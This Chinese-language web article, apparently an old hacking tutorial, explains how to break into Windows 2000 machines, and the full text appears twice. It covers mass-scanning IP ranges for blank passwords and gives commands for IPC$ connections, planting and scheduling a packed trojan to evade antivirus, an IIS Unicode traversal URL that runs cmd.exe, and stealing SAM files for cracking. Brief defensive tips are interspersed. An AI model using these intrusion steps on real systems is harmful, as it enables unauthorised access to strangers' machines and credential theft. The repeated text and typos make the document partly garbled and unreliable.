互联网入侵攻防实战
人气:0几种入侵方式
首先请安装WIN2000系统,然后打开扫描软件X-Scan2.3,再点击“设置/扫描参数”,在出现的对话框中添入一段IP地址,如61.139.*.1-61.139.2**.255,然后点击确定。继续点击“设置/扫描模块”,勾选SQL-Server弱口令、NT-Server弱口令,点击确定,再点击“开始扫描”。一会儿后,X-Scan就已经扫描完了,看看结果,有几十台电脑符合我们的要求。任意点击一IP地址如61.193.*.100,打开追捕,查看了一下该IP的具体位置以及用户名,做到心中有数,并查看一下该IP所开的端口以及所提供的服务,相关的步骤都可用X-Scan实现。收集完所有需要的信息后,就可以开始入侵了。
打开一个cmd窗口,输入net use \\61.193.*.100\ipc$ “密码” /user:”用户名”,回车,如果出现命令成功完成,那我们的电脑就和对方建立了IPC连接,再次在cmd中输入copy c:\hack\wollf.exe \\61.193.*.100\admin$,回车,这时我们就将木马程序wollf.exe拷贝到了对方的系统目录下,不过最好先加一下壳(这样不易被病毒防火墙查杀)。下一步就是启动这个黑客程序,WinNT上面有Schedule(定时)时务,可利用它来启动这个程序。首先看一下对方此时的时间,以便决定何时启动。输入命令net time \\61.193.*.100,查看一下对方此时的时间,以便决定何时启动。输入命令net time \\61.193.*.100,查看到对方的本地时间为23:11,那我们就用at命令来启动它。输入at \\61.193.*.100 23:13 wollf.exe,等待几分钟,我们就可以Telnet上去了。
这一次黑客入侵发现,管理员安全意识过于薄弱,密码竟然为空。而在我国的电脑上空口令非常多见,请现在还在使用空口令的用户赶快加上密码,密码最好在8位以上,采用大小写字母加字符的组合。不要以为采用了密码就可以安全无忧了,请记住在理论上没有攻克不了的密码,所以一定还要定期更改密码。还有一点,SQL Server安装后将产生默认的SA用户,密码为空,黑客可以SQL Server客户端来进行数据库远程连接。如果被扫描到,那你的系统也就完了,它所开放的端口为1433。
OK,请大家再次打开X-Scan,在扫描模块中点击IIS漏洞,并设置一个C类网段,经过扫描,又发现目标主机。IIS的漏洞比较多,但笔者认为比较经典的漏洞有Unncode,不过现在有这种漏洞的电脑已经比较少了,但少并不代表没有,打开浏览器输入http://IP/scripts/..% c1% 1c../winnt/system32/cmd.exe?/c dir c:/等语句试试,看见了C盘了吗?Unncode在一般情况下是不能获得管理员权限的,不过它可以下载SAM文件,在本地用LC4来进行暴力破解。SAM文件保存着Windows2000的登录名和密码等许多有用的信息,在WinNT中它叫SAM_,SAM文件在Windows启动后即被锁定,无法更改、拷贝,但可使用它在WinNT的Repair中的备份文件。
防御办法是把主目录C:\Inetpub修改成D:\Inetpub,对于Inetput目录中的Scripts,最好删除或更改文件名。因为在Scripts目录里可执行.EXE文件,它可是木马运行的好地方。可在“Internet信息服务”?“默认Web站点”中进行修改,我们还可以用Iislockd这个软件来进行防范,它是IIS管理员们的好助手。
另外还有IDQ/IDA溢出,对于这个溢出,可用Snake IIS溢出管理员进行防护。对于用漏洞进行溢出管理员的操作,我们可以这样防护:点击“计算机管理?Internet信息服务?默认Web站点”,点击右键选择属性,在出现的Web站点属性窗口中单主目录,在出现的目录中点击配置,在应用程序映射中删除.IDQ和.IDQ,确定后也就补住了这个漏洞。DDoS攻击现在还不是很常见,因为它所需要的条件较高,不是每个人都可以实现的。
几种入侵方式
首先请安装WIN2000系统,然后打开扫描软件X-Scan2.3,再点击“设置/扫描参数”,在出现的对话框中添入一段IP地址,如61.139.*.1-61.139.2**.255,然后点击确定。继续点击“设置/扫描模块”,勾选SQL-Server弱口令、NT-Server弱口令,点击确定,再点击“开始扫描”。一会儿后,X-Scan就已经扫描完了,看看结果,有几十台电脑符合我们的要求。任意点击一IP地址如61.193.*.100,打开追捕,查看了一下该IP的具体位置以及用户名,做到心中有数,并查看一下该IP所开的端口以及所提供的服务,相关的步骤都可用X-Scan实现。收集完所有需要的信息后,就可以开始入侵了。
打开一个cmd窗口,输入net use \\61.193.*.100\ipc$ “密码” /user:”用户名”,回车,如果出现命令成功完成,那我们的电脑就和对方建立了IPC连接,再次在cmd中输入copy c:\hack\wollf.exe \\61.193.*.100\admin$,回车,这时我们就将木马程序wollf.exe拷贝到了对方的系统目录下,不过最好先加一下壳(这样不易被病毒防火墙查杀)。下一步就是启动这个黑客程序,WinNT上面有Schedule(定时)时务,可利用它来启动这个程序。首先看一下对方此时的时间,以便决定何时启动。输入命令net time \\61.193.*.100,查看一下对方此时的时间,以便决定何时启动。输入命令net time \\61.193.*.100,查看到对方的本地时间为23:11,那我们就用at命令来启动它。输入at \\61.193.*.100 23:13 wollf.exe,等待几分钟,我们就可以Telnet上去了。
这一次黑客入侵发现,管理员安全意识过于薄弱,密码竟然为空。而在我国的电脑上空口令非常多见,请现在还在使用空口令的用户赶快加上密码,密码最好在8位以上,采用大小写字母加字符的组合。不要以为采用了密码就可以安全无忧了,请记住在理论上没有攻克不了的密码,所以一定还要定期更改密码。还有一点,SQL Server安装后将产生默认的SA用户,密码为空,黑客可以SQL Server客户端来进行数据库远程连接。如果被扫描到,那你的系统也就完了,它所开放的端口为1433。
OK,请大家再次打开X-Scan,在扫描模块中点击IIS漏洞,并设置一个C类网段,经过扫描,又发现目标主机。IIS的漏洞比较多,但笔者认为比较经典的漏洞有Unncode,不过现在有这种漏洞的电脑已经比较少了,但少并不代表没有,打开浏览器输入http://IP/scripts/..% c1% 1c../winnt/system32/cmd.exe?/c dir c:/等语句试试,看见了C盘了吗?Unncode在一般情况下是不能获得管理员权限的,不过它可以下载SAM文件,在本地用LC4来进行暴力破解。SAM文件保存着Windows2000的登录名和密码等许多有用的信息,在WinNT中它叫SAM_,SAM文件在Windows启动后即被锁定,无法更改、拷贝,但可使用它在WinNT的Repair中的备份文件。
防御办法是把主目录C:\Inetpub修改成D:\Inetpub,对于Inetput目录中的Scripts,最好删除或更改文件名。因为在Scripts目录里可执行.EXE文件,它可是木马运行的好地方。可在“Internet信息服务”?“默认Web站点”中进行修改,我们还可以用Iislockd这个软件来进行防范,它是IIS管理员们的好助手。
另外还有IDQ/IDA溢出,对于这个溢出,可用Snake IIS溢出管理员进行防护。对于用漏洞进行溢出管理员的操作,我们可以这样防护:点击“计算机管理?Internet信息服务?默认Web站点”,点击右键选择属性,在出现的Web站点属性窗口中单主目录,在出现的目录中点击配置,在应用程序映射中删除.IDQ和.IDQ,确定后也就补住了这个漏洞。DDoS攻击现在还不是很常见,因为它所需要的条件较高,不是每个人都可以实现的。
加载全部内容